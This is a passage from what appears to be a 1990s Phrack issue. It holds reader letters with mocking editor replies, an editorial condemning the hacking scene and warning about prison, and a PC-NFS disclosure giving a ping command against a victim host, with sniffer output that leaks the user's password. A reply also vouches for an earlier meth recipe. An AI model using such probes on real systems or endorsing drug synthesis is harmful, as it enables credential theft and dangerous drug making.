Once mommie sends you off to college, you might need it even more. And
in the distant future, when you get out on your own, you will really
know.
Yes, phiber is swell. There have been good pictures of him in many
national magazines. Try not to get the pages stuck together.
And, yes, I do know his email address. Thanks for asking! ]
-----------------------------------------------------------------------------
From: prodigy.com (MR MARK P DOLESH)
How do you hack?
[ Very carefully. ]
-----------------------------------------------------------------------------
Did you ever write a edition that deals with breaking the screensavers
code? If so which one? How about breking the Win95 password. You know
the one that allows you into Win95?
[ We pass all articles about breaking Windows Screen Savers on to
the more technical forum at 2600 magazine.
To disable the Win95 password, install Linux. ]
-----------------------------------------------------------------------------
A phriend of mine showed me your sight a few days ago at his house...I
thought it was pretty cool. I dloaded a few issues and stuff to check
out...I haven't been on the internet to long so I'm still trying to phined
more stuff that interest me, and I would like to set up my own page like
that but my account is thru the school...Is there anyway around that? So
it can be like border line legal? How underground can one go??? If you
still have the file on where the line is please send them...Thanks.
[ Your account is through your school, but you are looking for a way around
that? Hmmm...let me see. I'm just going to throw out something wild
and crazy, but, what the hell: Maybe, get another account through
another Internet provider? I know, it's just too outlandish. Forgive
me for being so zany.
How underground can you really go? I used to have that file you are looking
for, but I was so underground at the time, it got soiled with mud and
disintegrated, eventually polluting the water table, and was ultimately
drank by the city of Pasadena, Texas. ]
-----------------------------------------------------------------------------
In regards to volume one ,issue four , Phile #8 of 11 ...
This shit has got to be a joke , I tryed to make some and
Was a great dissapointment ????
[ The meth recipe works just fine. Obviously you DIDN'T try to make it.
If you feel like a REAL MORON, look at the cat recipe in the line noise
section of this issue. Stay up for a week, go into deep amphetamine
psychosis and die! Woo Woo! ]
-----------------------------------------------------------------------------
I ve tried to locate these guys who have Black book for cracking
passwords in major software and some games as well.They go by the Names
of Jolly Reaper and Maugan Ra aka Manix.Iam doc X from London (not a
pig!!!) if U happpen to know these doodez let us know.TA from GB
[ Perhaps you have Phrack confused with something having to do with
pirated software. I'd ask that question in a posting to the USENET
group alt.warez or on the IRC #warez channels. ]
-----------------------------------------------------------------------------
Eric,
i have been searching the internet for some kind of script that
will subscribe a certain email address to a shitload of
mailing lists...i have heard of such a thing.
what im lacking is that keyword to search for such as:
bombard
attack
flash
what is the technical term for this kind of attack?
or better yet, do you know where to get a hold of such a script.
im not familiar with mailing lists and id rather not spend the time
researching the topic...but i need vengeance quickly :-)
any help appreciated,
-roger
[ The name for this type of attack? Uh, an email bomb?
But let's take a closer look at your mail:
"id rather not spend the time researching the topic...but I need vengeance
quickly"
I'm not going to be your fucking research assistant, or your accomplice.
If you can't figure out how to look through our back issues to find any of
the tons of fake mailers we've printed, or figure out how to automate them
using shell script, then you don't deserve to live, much less
get your speedy vengeance.
Couldn't you even come up with a NON-LAME way to get back at someone? Hell,
even rewriting their .login to say "exit" or something silly like that is
more clever, and less cliche, than flooding their inbox. ]
-----------------------------------------------------------------------------
The art of " information manipulation " has possessed my virgin soul ! I
turned into a fuckin' 2-year old (drool and all) when experiencing the free
local call system involving a paperclip . All I've been thinking is hack,
haCK, HACK ! I'm still drenched behind the ears but I'm a patient, turbo
learner (whatever the hell that means) !
Here's the problem: I possess some info that could make you smile so
big, that your sphinctor would unwrinkle. I would like to experiment, if you
will . Perhaps, dabble with this stuff , but I am very uneducated in raping
mainframes. This could be a major wood producer
because my EX works at this establishment .
I need a trustworthy pro who possesses a plethora of tasty tactics . Whic
h way to the Dagobah System.....I seek YODA !!
[ Drooling 2-year old.
Very uneducated in raping mainframes.
Major wood producer.
Well, gee, I'm sure your info would make my "sphinctor" unwrinkle, but I'm
wearing a new pair of jeans, so I guess I'll have to take a rain check.
God bless AOL for bringing the internet to the masses! ]
-----------------------------------------------------------------------------
i want to be added to your list. and could you send me unziped hacking
software or can you tell me how to unzip softwarre nd a beginners guide
to hacking. i would appreciate it i want to begin fun new field of
hacking thank you
[ You want to learn all about hacking, but you don't know how to unzip
files?
Crawl before you run, Kwai Chang. ]
-----------------------------------------------------------------------------
VA'CH CO' TAI
Anh Ta'm ddi du li.ch xa, ngu? ta.i mo^.t kha'ch sa.n. DDa~ ma^'y
tie^'ng ddo^`ng ho^` ro^`i anh ngu? kho^ng ddu*o*.c vi` tie^'ng cu*o*`i
no'i huye^n na'o tu*` pho`ng be^n ca.nh vo.ng sang. Ro~ ra`ng la` ho.
ddang dda'nh ba`i, sa't pha.t nhau a(n thua lo*'n.
Ra'ng nhi.n cho to*'i 3 gio*` sa'ng va^~n cu*' tra(`n tro.c hoa`i, anh
Ta'm chi.u he^'t no^?i, be`n go~ nhe. va`o va'ch dde^? nha('c khe'o
pho`ng be^n ca.nh.
Anh Ta'm vu*`a go~ xong la^.p tu*'c anh nghe mo^.t gio.ng tenor he't le^n
tu*` pho`ng be^n:
- Tro*`i o*i! Co' bie^'t ba^y gio*` la` ma^'y gio*` sa'ng ro^`i
kho^ng? O*? ddo' ma` ddo'ng ddinh treo hi`nh!
- ?!?!?
[Uh, let's see...No Boom Boom with soul brother. Soul Brother too beaucoup.
Ddi Ma'o.]
-----------------------------------------------------------------------------
Hola me gustaria tener mucha informacion de lo que ustedes hacen sobre
todo de como lo hacen. Es decir que me manden informacion de los secretos
de los sistemas operativos de internet de todo lo que me puedan mandar.
yo soy universitario, y me gusta todo lo relacionado con redes.
Muchos saludos.
Contestenme.
[ What is this, International Day?
!Si quieras mucha informacion, LEA MUCHOS LIBROS! !DIOS MIO! !No estoy
el maestro del mundo! Ehehe, esta fue solomente una chiste. No esta
nunca libros en espanol sobre <<computer security>>. Que lastima.
If you want to learn, start with english...then go buy the entire O'Reilly
Yellow series and Blue series. That will get you started learning
"los secretos de los sistemas operativos de internet." ]
-----------------------------------------------------------------------------
From: "Erik K. Escobar"
Subject: Apology
This letter is to be forwared to the newsgroup io.general by madmagic, in
care of Mr. Escobar.
I would like to send a public apology to Internex Online for the
treatment I have given the staff and users of this system. I threw
around some threats and words that can incriminate me, and realized that
it was a stupid idea on my behalf. In the last week or so with the
negative attention I have gotten, I got to know the IO/ICAN staff a bit
better and everything in good standing. Me and Internex Online are now
even and there will be no retaliation or sour words from me. I just want
everything to go back to the norm.
Erik
[ * AND THEN * ]
From: "Erik K. Escobar"
Subject: Shit
As my understanding, A letter of apology under my name was redistributed
around within my mailing list and whatever. As some of you know, myself
and Zencor have been having problems with Internex in the past and near
the middle of this week, I got into a large battle with was ACC, ICAN,
and Internex Online -vs- Me. It is stupid to get into an argument with
that many corporations, and a few words and threats were thrown, they
locked my account. I wrote a letter in response of that and they
proceded to lock other Zencor staff accounts and hack our web site. Also
they posted the letter in the news groups and whatever. They eventually
decided to charge me and whatever, and to save me time outta the courts
and crap like that I made an apology for the threats, seeing that they
could incriminate me. Internex has done wrong and I probably won't be
seeing alot of apologies coming my way. If they didn't have certain info
about me..they could have me very well laughing at them but that is not
the case.
Erik
Lord Kaotik
[ ZENC0R TECHN0L0GIES ]
[ Can you say, LAME? ]
-----------------------------------------------------------------------------
Been trying to locate for some time the file, plusmap.txt that used to be on
the phrack bbs (716-871-1915). This file outlined information regarding the
videopal in the videocipher II plus satellite decoder module. Any idea where
I might find this file?
[ I didn't know there was a "phrack" bbs. <Sigh>
In any case, I would look for information regarding this on the following
sites:
http://www.scramblingnews.com
http://www.hackerscatalog.com
http://ireland.iol.ie/~kooltek/welcome.html
Satellite Watch BBS : 517-685-2451
This ought to get you in the right direction. ]
-----------------------------------------------------------------------------
Hi,
Just a quick note to tell you about the Hawaii Education Literacy Project -
a non-profit organization - and our efforts to promote literacy by making
electronic text easier and more enjoyable to read. Given that we're both in
the reading biz, I thought you might be interested.
ReadToMe, our first program, reads aloud any form of electronic text,
including Web pages, and is free to anyone who wishes to use it.
The "Web Designers" section of our home page tells you how your pages can
literally speak to your audience. Actually, all you need to do to make your
pages audible is to add the following html code:
<P><A HREF="http://www.pixi.com/~reader1/readweb.bok">Hear
This Page!</A> Requires ReadToMe Software... Don't got it? <A
HREF="http://www.pixi.com/~reader1">GET IT FREE!</A>
</P>
A beta test version of the program can be obtained from
http://www.pixi.com/~reader1. I encourage you and your readers to download
a copy and take it for a spin.
Thank you for your time,
Rob Hanson
rhanson@freeway.net
Hawaii Education Literacy Project
[ Honestly, I don't know if this is a spam to a list of magazine people, or
really a phrack reader. I have this thing about jumk email, and the joy of
offering that info to our thousands of bored hacker readers looking for
an excuse to fuck with some system.
I'll let them decide if this was a spam. Thanks, Rob. ]
-----------------------------------------------------------------------------
*******************************
SYNTHETIC PLEASURES opens in the US theaters
*******************************
save the date, spread the word. forgive us if you got this before.
-----------------------------------------------------------------------
eerily memorable is SYNTHETIC PLEASURES, a trippy, provocative tour through
the perfectly artificial worlds of cyberspace, plastic surgery,
mind-altering chemicals and controlled, man-made environments that
questions whether the natural world is redundant, or even necessary. those
who see it will want to pinch themselves when it's over.
(janet maslin- The New York Times)
------------------------------------------------------------------------
for further info contact:
caipirinha@caipirinha.com
http://www.syntheticpleasures.com
first opening dates:
Aug 29 Los Angeles, CA- Nuart Theatre
Aug 30 San Francisco, CA- Castro Theatre
Aug 30 Berkeley, CA- UC Theatre
Aug 30 San Jose, CA- Towne Theatre
Aug 30 Palo Alto, CA- Aquarius Theatre
Aug 30 Portland, OR- Cinema 21
Sept 13 San Diego, CA- Ken Theatre
Sept 13 NYC, NY- Cinema Village
Sept 13 NYC, NY- City Cinemas
Sept 13 Larkspur, CA- Larkspur Theatre
Sept 20 Boston, MA- Kendall Square Theater
Sept 20 Cleveland, OH- Cedar Lee
Sept 20 Philadelphia, PA- Ritz
Sept 22 Vorheess, NJ- Ritz 12
Sept 27 Austin, TX- Dobie Theater
Sept 27 New Haven, CT- York Theatre
Sept 27 Pittsburgh,PA- Rex
Oct 4 Washington, DC- Key Cinema
Oct 11 Providence, RI- Avon Theater
Oct 11 Kansas City, MO- Tivoli
Oct 11 Baltimore,MD - Charles Theatre
Oct 18 Waterville MA- Railroad Square
Oct 18 Durham,NC - Carolina Theater
Oct 18 Raleigh, NC - Colony Theater
Oct 18 Chapel Hill,NC -The Chelsea Theatre
Oct 25 Seattle, WA- Varsity
Nov 8 Ft Lauderdale FL- Fox Sunrise
Nov 15 Gainesville,FL - Plaza Theater
Nov 16 Hanover, NH- Dartmouth Theater
Nov 22 Miami, FL- Alliance
Nov 25,29,30 Tampa FL - Tampa Theatre
Dec 13 Chicago, IL - Music Box
[ THIS WAS DEFINATELY A SPAM.
I wonder what lovely cgi-bin holes that WWW site is sporting.
But wait, maybe they just want some k-rad cyber-press like
MGM got for the "Hackers" WWW page. Oh man, what a dilemma.
To hack, or not to hack. Assholes. ]
-----------------------------------------------------------------------------
==Phrack Magazine==
Volume Seven, Issue Forty-Eight, File 2a of 18
Phrack Editorial
by
Erik Bloodaxe
This may very well be my last Phrack editorial, since I'm no longer going to
fill the day-to-day role of editor, so I figure I ought to close out my
crusade to piss everyone off.
I don't like most of you people. The hacking subculture has become a
mockery of its past self. People might argue that the community has
"evolved" or "grown" somehow, but that is utter crap. The community
has degenerated. It has become a media-fueled farce. The act of intellectual
discovery that hacking once represented has now been replaced by one of
greed, self-aggrandization and misplaced post-adolescent angst.
DefCon IV epitomized this change in such amazing detail, that I can only hope
to find words to describe it adequately. Imagine the bastard offspring
of Lollapalooza and a Star Trek convention. Imagine 300+ people out of their
homes, and away from Mother's watchful eye for the first time in their
pathetic lives. Imagine those same people with the ego of Rush Limbaugh and
the social skills of Jeffrey Dahmer, armed with laptops loaded with programs
they can't use, and talking at length to reporters about techniques they
don't understand. Welcome to DefCon.
If I were to judge the health of the community by the turnout of this
conference, my prognosis would be "terminally ill."
It would seem that "hacking" has become the next logical step for many people
looking for an outlet to strike back at "something." "Well, gee, I've already
pierced every available piece of skin on my body and dyed my hair blue...what
on earth can I do now to shock my parents? I know! I'll break some federal
laws, and maybe get my name in the paper! THAT WOULD BE COOL! It'll be
just like that movie!"
I hate to burst everyone's bubble, but you are so fucked up.
In this day and age, you really don't have to do anything illegal to be
a hacker. It is well within the reach of everyone to learn more, and use
more powerful computers legally than any of us from the late 70's and early
80's ever dreamed. Way back then, it was ALL about learning how to use these
crazy things called computers. There were hundreds of different types of
systems, hundreds of different networks, and everyone was starting from ground
zero. There were no public means of access; there were no books in stores or
library shelves espousing arcane command syntaxes; there were no classes
available to the layperson. We were locked out.
Faced with these obstacles, normal, intelligent, law-abiding adolescents from
around the globe found themselves attempting to gain access to these
fascinating machines through whatever means possible. There simply was
no other way. There were no laws, and yet everyone knew it wasn't strictly
kosher behavior. This fact added a cheap rush to the actual break-in, but
the main drive was still simply to learn.
Now, with the majority of operating systems being UNIX-based, and the majority
of networks being TCP/IP-based the amount of knowledge to be gathered has
shrunk considerably. With the incredibly low prices of powerful personal
computers, and the free availablity of complex operating systems, the need
to break into remote systems in order to learn has been removed. The only
possible needs being met by remote intrusions would be a means to gather
specific information to be sold, or that base psychological rush from doing
something forbidden and getting away with it. Chasing any high only leads
to a serious crash, and in the case of breaking into computers, that
only leads to jail.
There is absolutely nothing cool about going to jail. I know too many
people who are currently in jail, who have been in jail, and some who are
on their way to jail. Trust me on this, people. You will not be
respected by anyone if you act rashly, do something careless and
end up being convicted of several felonies. In fact, all of your "friends,"
(those who didn't get busted along with you, and turn state's evidence against
you) will just think you were a moron for being so sloppy...until they also
get nailed.
Get raided and you will almost certainly spend time in jail. Even once you
are released, you will lose your passport and your ability to travel freely,
you will lose your ability to do business in classified environments, you
will become unemployable by most companies, you may even lose your rights to
use computer or networking equipment for years. Is is still worth it?
I break into computers for a living, and I love my job. However, I don't
kid myself about just how lucky I really am. Don't fool yourselves into
thinking that it was easy for me to achieve this, or that anyone else can
easily slip into such a role. Staking out a claim in the information security
industry is a continual battle for a hacker. Your past will constantly
stand in your way, especially if you try to hide it and lie to everyone.
(Read the recent Forbes ASAP article and spot the hacker from Garrison
Associates lying about his past, although he was raided for running
the Scantronics Publications BBS in San Deigo just a few short years ago.
Shame on you Kludge.)
I've never lied about anything, so that can't be held over my head. I've
never been convicted of anything either, although I came closer to jail
than hopefully any of you will ever experience. The ONLY reason I avoided
prison was the fact that law enforcement was not prepared to deal with
that type of crime. Now, I've taught many of those same law enforcement
agencies about the nature of computer crimes. They are all learning and
not making the same mistakes any more.
At the same time, the technology to protect against intrusions has increased
dramatically. Technology now exists that will not only stop attacks, but
identify the attack methodology, the location of the attacker, and take
appropriate countermeasures all in real-time. The company I work for makes it.
I've always said that anything that can stop me will stop almost anyone,
even through I'm not anywhere close to the world's best. There simply
aren't that many things to monitor, once you know what to look for.
The rewards have diminished and the risks have increased.
Hacking is not about crime. You don't need to be a criminal to be a hacker.
Hanging out with hackers doen't make you a hacker any more than hanging
out in a hospital makes you a doctor. Wearing the t-shirt doesn't
increase your intelligence or social standing. Being cool doesn't mean
treating everyone like shit, or pretending that you know more than everyone
around you.
Of course, I'm just a bitter old sell-out living in the past, so
what do I know?
Well, what I do know, is that even though I'm one of the few screaming about
how fucked up and un-fun everything has become, I'm not alone in my disgust.
There are a bunch of us who have reached the conclusion that the "scene"
is not worth supporting; that the cons are not worth attending; that the
new influx of would-be hackers is not worth mentoring. Maybe a lot of us
have finally grown up.
In response, expect a great many to suddenly disappear from the cons. We'll be
doing our own thing, drinking a few cool drinks someplace warm, and reflecting
on the collective pasts we've all drawn from, and how the lack of that
developmental stage has ruined the newer generations. So those of us
with that shared frame of reference will continue to meet, enjoy each
other's company, swap stock tips in the same breath as operating system
flaws, and dream about the future of security.
You're probably not invited.
-----------------------------------------------------------------------------
==Phrack Magazine==
Volume Seven, Issue Forty-Eight, File 3 of 18
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
Part I
------------------------------------------------------------------------------
PC-NFS Bug
I have found a nice little security hole in PC-NFS version 5.x. If you
ping a PC-NFS user with a packet size of between 1450 to 1480, the
PC'?s ICMP reply packet will divulge:
o The hostname of the PC
o The hostname of the PC'?s authentication server
o The username of the person logged in
o The password for the user
(Thank you very much!)
All of this information is in clear text unless PC-NFS?'s NETLOGIN is
used. NETLOGIN uses XOR as its encryption, so this is hardly secure
either.
NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested
and all freely return the above information on both PC-NFS versions
5.0 and 5.1a. This should work with other driver/NIC configurations
also.
You get the occasional added bonus of locking up the victims PC as
well!
This bug was new to Sun and they have created a new PCNFS.SYS
driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD.
This new version fills reply ICMP packets with nulls after 200 bytes of
the requested pattern.
Until you receive this patch from Sun, I would recommend setting all
external router interface MTU to a value of no greater than 1350 as this
is point where secrets are contained in the return packet.
The Unix command to generate the below results is as follows:
ping -s -c1 pchost.victim.com 1480
Use your favorite sniffer to filter ICMP packets and you have it. If you
don'?t have a sniffer, try the -v(erbose) option of ping and convert the
hex to ascii starting around byte 1382.
Sniffer output follows:
19:03:48.81
ip: evil.com->pchost.victim.com
icmp: echo request
62: 024 025 026 027 030 031 032 033 034 035
72: 036 037 ! " # $ % & '
82: ( ) * + , - . / 0 1
92: 2 3 4 5 6 7 8 9 : ;
102: < = > ? @ A B C D E
112: F G H I J K L M N O
122: P Q R S T U V W X Y
132: Z [ \ ] ^ _ ` a b c
142: d e f g h i j k l m
152: n o p q r s t u v w
162: x y z { | } ~ 177 200 201
172: 202 203 204 205 206 207 210 211 212 213
182: 214 215 216 217 220 221 222 223 224 225
192: 226 227 230 231 232 233 234 235 236 237
202: 240 241 242 243 244 245 246 247 250 251
212: 252 253 254 255 256 257 260 261 262 263
222: 264 265 266 267 270 271 272 273 274 275
232: 276 277 300 301 302 303 304 305 306 307
242: 310 311 312 313 314 315 316 317 320 321
252: 322 323 324 325 326 327 330 331 332 333
262: 334 335 336 337 340 341 342 343 344 345
272: 346 347 350 351 352 353 354 355 356 357
282: 360 361 362 363 364 365 366 367 370 371
292: 372 373 374 375 376 377 000 001 002 003
302: 004 005 006 007 010 011 012 013 014 015
312: 016 017 020 021 022 023 024 025 026 027
322: 030 031 032 033 034 035 036 037 !
332: " # $ % & ' ( ) * +
342: , - . / 0 1 2 3 4 5
352: 6 7 8 9 : ; < = > ?
362: @ A B C D E F G H I
372: J K L M N O P Q R S
382: T U V W X Y Z [ \ ]
392: ^ _ ` a b c d e f g
402: h i j k l m n o p q
412: r s t u v w x y z {
422: | } ~ 177 200 201 202 203 204 205
432: 206 207 210 211 212 213 214 215 216 217
442: 220 221 222 223 224 225 226 227 230 231
452: 232 233 234 235 236 237 240 241 242 243
462: 244 245 246 247 250 251 252 253 254 255
472: 256 257 260 261 262 263 264 265 266 267
482: 270 271 272 273 274 275 276 277 300 301
492: 302 303 304 305 306 307 310 311 312 313
502: 314 315 316 317 320 321 322 323 324 325
512: 326 327 330 331 332 333 334 335 336 337
522: 340 341 342 343 344 345 346 347 350 351
532: 352 353 354 355 356 357 360 361 362 363
542: 364 365 366 367 370 371 372 373 374 375
552: 376 377 000 001 002 003 004 005 006 007
562: 010 011 012 013 014 015 016 017 020 021
572: 022 023 024 025 026 027 030 031 032 033
582: 034 035 036 037 ! " # $ %
592: & ' ( ) * + , - . /
602: 0 1 2 3 4 5 6 7 8 9
612: : ; < = > ? @ A B C
622: D E F G H I J K L M
632: N O P Q R S T U V W
642: X Y Z [ \ ] ^ _ ` a
652: b c d e f g h i j k
662: l m n o p q r s t u
672: v w x y z { | } ~ 177
682: 200 201 202 203 204 205 206 207 210 211
692: 212 213 214 215 216 217 220 221 222 223
702: 224 225 226 227 230 231 232 233 234 235
712: 236 237 240 241 242 243 244 245 246 247
722: 250 251 252 253 254 255 256 257 260 261
732: 262 263 264 265 266 267 270 271 272 273
742: 274 275 276 277 300 301 302 303 304 305
752: 306 307 310 311 312 313 314 315 316 317
762: 320 321 322 323 324 325 326 327 330 331
772: 332 333 334 335 336 337 340 341 342 343
782: 344 345 346 347 350 351 352 353 354 355
792: 356 357 360 361 362 363 364 365 366 367
802: 370 371 372 373 374 375 376 377 000 001
812: 002 003 004 005 006 007 010 011 012 013
822: 014 015 016 017 020 021 022 023 024 025
832: 026 027 030 031 032 033 034 035 036 037
842: ! " # $ % & ' ( )
852: * + , - . / 0 1 2 3
862: 4 5 6 7 8 9 : ; < =
872: > ? @ A B C D E F G
882: H I J K L M N O P Q
892: R S T U V W X Y Z [
902: \ ] ^ _ ` a b c d e
912: f g h i j k l m n o
922: p q r s t u v w x y
932: z { | } ~ 177 200 201 202 203
942: 204 205 206 207 210 211 212 213 214 215
952: 216 217 220 221 222 223 224 225 226 227
962: 230 231 232 233 234 235 236 237 240 241
972: 242 243 244 245 246 247 250 251 252 253
982: 254 255 256 257 260 261 262 263 264 265
992: 266 267 270 271 272 273 274 275 276 277
1002: 300 301 302 303 304 305 306 307 310 311
1012: 312 313 314 315 316 317 320 321 322 323
1022: 324 325 326 327 330 331 332 333 334 335
1032: 336 337 340 341 342 343 344 345 346 347
1042: 350 351 352 353 354 355 356 357 360 361
1052: 362 363 364 365 366 367 370 371 372 373
1062: 374 375 376 377 000 001 002 003 004 005
1072: 006 007 010 011 012 013 014 015 016 017
1082: 020 021 022 023 024 025 026 027 030 031
1092: 032 033 034 035 036 037 ! " #
1102: $ % & ' ( ) * + , -
1112: . / 0 1 2 3 4 5 6 7
1122: 8 9 : ; < = > ? @ A
1132: B C D E F G H I J K
1142: L M N O P Q R S T U
1152: V W X Y Z [ \ ] ^ _
1162: ` a b c d e f g h i
1172: j k l m n o p q r s
1182: t u v w x y z { | }
1192: ~ 177 200 201 202 203 204 205 206 207
1202: 210 211 212 213 214 215 216 217 220 221
1212: 222 223 224 225 226 227 230 231 232 233
1222: 234 235 236 237 240 241 242 243 244 245
1232: 246 247 250 251 252 253 254 255 256 257
1242: 260 261 262 263 264 265 266 267 270 271
1252: 272 273 274 275 276 277 300 301 302 303
1262: 304 305 306 307 310 311 312 313 314 315
1272: 316 317 320 321 322 323 324 325 326 327
1282: 330 331 332 333 334 335 336 337 340 341
1292: 342 343 344 345 346 347 350 351 352 353
1302: 354 355 356 357 360 361 362 363 364 365
1312: 366 367 370 371 372 373 374 375 376 377
1322: 000 001 002 003 004 005 006 007 010 011
1332: 012 013 014 015 016 017 020 021 022 023
1342: 024 025 026 027 030 031 032 033 034 035
1352: 036 037 ! " # $ % & '
1362: ( ) * + , - . / 0 1
1372: 2 3 4 5 6 7 8 9 : ;
1382: < = > ? @ A B C D E
1392: F G H I J K L M N O
1402: P Q R S T U V W X Y
1412: Z [ \ ] ^ _ ` a b c
1422: d e f g h i j k l m
1432: n o p q r s t u v w
1442: x y z { | } ~ 177 200 201
1452: 202 203 204 205 206 207 210 211 212 213
1462: 214 215 216 217 220 221 222 223 224 225
1472: 226 227 230 231 232 233 234 235 236 237
1482: 240 241 242 243 244 245 246 247 250 251
19:03:48.85
ip: pchost.victim.com->evil
icmp: echo reply
62: 024 025 026 027 030 031 032 033 034 035
72: 036 037 ! " # $ % & '
82: ( ) * + , - . / 0 1
92: 2 3 4 5 6 7 8 9 : ;
102: < = > ? @ A B C D E
112: F G H I J K L M N O
122: P Q R S T U V W X Y
132: Z [ \ ] ^ _ ` a b c
142: d e f g h i j k l m
152: n o p q r s t u v w
162: x y z { | } ~ 177 200 201
172: 202 203 204 205 206 207 210 211 212 213
182: 214 215 216 217 220 221 222 223 224 225
192: 226 227 230 231 232 233 234 235 236 237
202: 240 241 242 243 244 245 246 247 250 251
212: 252 253 254 255 256 257 260 261 262 263
222: 264 265 266 267 270 271 272 273 274 275
232: 276 277 300 301 302 303 304 305 306 307
242: 310 311 312 313 314 315 316 317 320 321
252: 322 323 324 325 000 000 324 005 ^ $
262: : 004 000 000 000 000 000 000 000 000
272: 036 006 W V P S Q R 016 007
282: 277 ^ $ 213 367 350 X p r c
292: 212 E " < 000 u 005 350 V 003
302: 353 W < 005 u 005 350 W 002 353
312: N < 010 u 007 306 006 325 # 001
322: 353 H < 015 u 007 306 006 325 #
332: 001 353 = < 017 u 007 306 006 325
342: # 001 353 2 < 022 u 005 350 021
352: 002 353 $ < 003 u 005 350 9 003
362: 353 033 < 022 w 017 2 344 213 360
372: 212 204 300 # P 350 225 305 X 353
382: 010 P 270 c 000 350 213 305 X 306
392: 006 205 347 000 Z Y [ X ^ _
402: 007 037 313 P S Q R U 036 006
412: W V 214 310 216 330 216 300 306 006
422: 325 # 000 373 277 ^ $ 273 A 347
432: 271 006 000 215 6 d $ 212 004 210
442: 005 212 007 210 004 F G C 342 363
452: 241 x $ 243 | $ 241 z $ 243
462: ~ $ 241 324 ) 243 x $ 241 326
472: ) 243 z $ 277 ^ $ 212 E "
482: < 010 u 015 P 270 ` 000 350 $
492: 305 X 350 275 001 353 022 < 015 u
502: 012 P 270 a 000 350 023 305 X 353
512: 004 < 017 u 003 350 017 000 306 006
522: 205 347 000 ^ _ 007 037 ] Z Y
532: [ X 303 P 270 < 000 350 363 304
542: X 307 E $ 000 000 215 u " 213
552: M 020 206 351 203 351 024 367 301 001
562: 000 t 006 213 331 306 000 000 A 321
572: 371 350 , o 211 ] $ 307 E 030
582: 000 000 215 u 016 271 012 000 350 033
592: o 211 ] 030 213 E 020 206 340 005
602: 016 000 243 ` % 211 > b % 214
612: 016 d % 277 ^ % . 376 006 ?
622: 020 350 9 276 . 376 016 ? 020 303
632: & 213 E 002 013 300 t 020 243 326
642: # & 213 ] 004 211 036 330 # 350
652: 231 m 353 0 200 > 324 ) 000 t
662: 033 & 203 } 006 000 t 024 203 >
672: 326 # 000 u 015 350 031 000 203 >
682: 326 # 000 t 003 350 u m 241 326
692: # & 211 E 002 241 330 # & 211
702: E 004 303 & 213 M 006 006 V W
712: 016 007 272 000 000 277 334 # 350 $
722: 000 241 323 # 243 350 X 203 > 326
732: # 000 u 023 366 006 343 015 001 u
742: 014 203 > 350 X 000 u 353 272 001
752: 000 342 332 _ ^ 007 303 Q R W
762: 203 372 000 u 021 203 > 030 214 000
772: t 012 276 004 214 271 003 000 363 245
782: 353 010 270 377 377 271 003 000 363 253
792: 276 A 347 271 003 000 363 245 _ 270
802: 377 377 211 E 036 211 E 241 324
812: ) 211 E 032 241 326 ) 211 E 034
822: 270 000 206 340 211 E 020 306 E
832: 016 E 306 E 017 000 307 E 022 000
842: 000 307 E 024 000 000 306 E 026 002
852: 306 E 027 001 307 E 014 010 000 3
862: 300 306 E " 021 210 E # 211 E
872: & 211 E ( 350 250 376 Z Y 303
882: 200 > 326 # 000 u 014 213 E *
892: 243 326 # 213 E , 243 330 # P
902: 270 V 000 350 205 303 X 303 P S
912: Q R 213 E : 213 ] < 213 M
922: & 213 U ( 350 223 k Z Y [
932: X P 270 \ 000 350 e 303 X 303
942: 306 E " 000 P 270 X 000 350 X
952: 303 X 303 & 213 E 002 & 213 ]
962: 004 & 213 U 006 006 W 016 007 350
972: Y i s 003 351 227 000 277 334 #
982: W 271 003 000 363 245 276 A 347 271
992: 003 000 363 245 _ 211 E 036 211 ]
1002: 241 324 ) 211 E 032 241 326 )
1012: 211 E 034 270 000 206 340 211 E
1022: 020 306 E 016 E 306 E 017 000 307
1032: E 022 000 000 307 E 024 000 000 306
1042: E 026 377 306 E 027 001 307 E 014
1052: 010 000 3 300 306 E " 010 210 E
1062: # 211 E & 377 006 h % 241 h
1072: % 211 E ( 211 026 350 X 211 026
1082: l % 307 006 j % 000 000 350 322
1092: 375 203 > 350 X 000 t # 366 006
1102: 343 015 001 u ! 203 > j % 000
1112: t 353 203 > j % 001 u 011 241
1122: l % + 006 350 X 353 015 270 375
1132: 377 353 010 270 376 377 353 003 270 377
1142: 377 307 006 l % 000 000 _ 007 &
1152: 211 E 010 303 P 270 ^ 000 350 206
1162: 302 X 203 > l % 000 t 017 213
1172: ] ( ; 036 h % u 006 307 006
1182: j % 001 000 303 P 270 ; 000 350
1192: g 302 X 203 > l % 000 t 006
1202: 307 006 j % 002 000 303 000 000 000
1212: 000 000 000 000 000 000 000 000 000 000
1222: 000 000 000 000 000 000 000 000 000 000
1232: 000 000 000 000 000 000 000 000 000 000
1242: 000 000 000 000 000 000 000 000 002 000
1252: 000 000 300 A 000 000 034 000 000 000
1262: 200 000 000 000 k 000 000 000 000 016
1272: 000 000 000 000 000 000 000 000 000
1282: 010 000 000 000 252 001 000 000 010 5
1292: 000 000 r 027 301 . 000 000 000 000
1302: 036 F 300 . 000 000 000 000 036 F
1312: 300 . 000 000 000 000 000 000 000 000
1322: 000 000 000 000 000 000 000 000 000 000
1332: 000 000 000 000 000 000 000 000 000 000
1342: 000 000 000 000 000 000 000 000 000
1352: 000 000 000 002 000 000 200 366 = 000
1362: { 255 023 000 242 265 015 000 002 000
1372: 000 000 S 017 005 000 C 003 000 000
1382: p c h o s t 000 000 000 000
1392: 000 000 000 000 000 000 244 A @ -
1402: s e r v e r 1 000 000 000
1412: 000 000 000 000 000 000 244 A @ 001
1422: 000 000 000 000 000 000 000 000 000 000
1432: 000 000 000 000 000 000 244 A @ 001
1442: u s e r n a m e 000 000
1452: p a s s w d 000 000 000 000
1462: 000 000 000 000 000 000 000 000 000 000
1472: 000 000 000 000 000 000 000 000 000 000
1482: 000 000 200 000 k 000 260 271 377 377
1492: 344 275 9 212
The names have been changed to protect the innocent, but the rest is actual.
Byte 1382: PC's hostname
Byte 1402: PC's Authentication server hostname
Byte 1382: The user's account name. Shows nobody if logged out.
Byte 1382: The user's password.
------------------------------------------------------------------------------
POCSAG paging format, code and code capacity
The POCSAG (Post Office Code Standardization Advisory Group) code is a
synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
structure. The POCSAG codes provides improved battery-saving capability and an
increased code capacity.
The POCSAG code format consists of a preamble and one or more batches of
codewords. Each batch comprises a 32-bit frame synchronization code and eight
64-bit address frames of two 32-bit addresses or idle codewords each. The
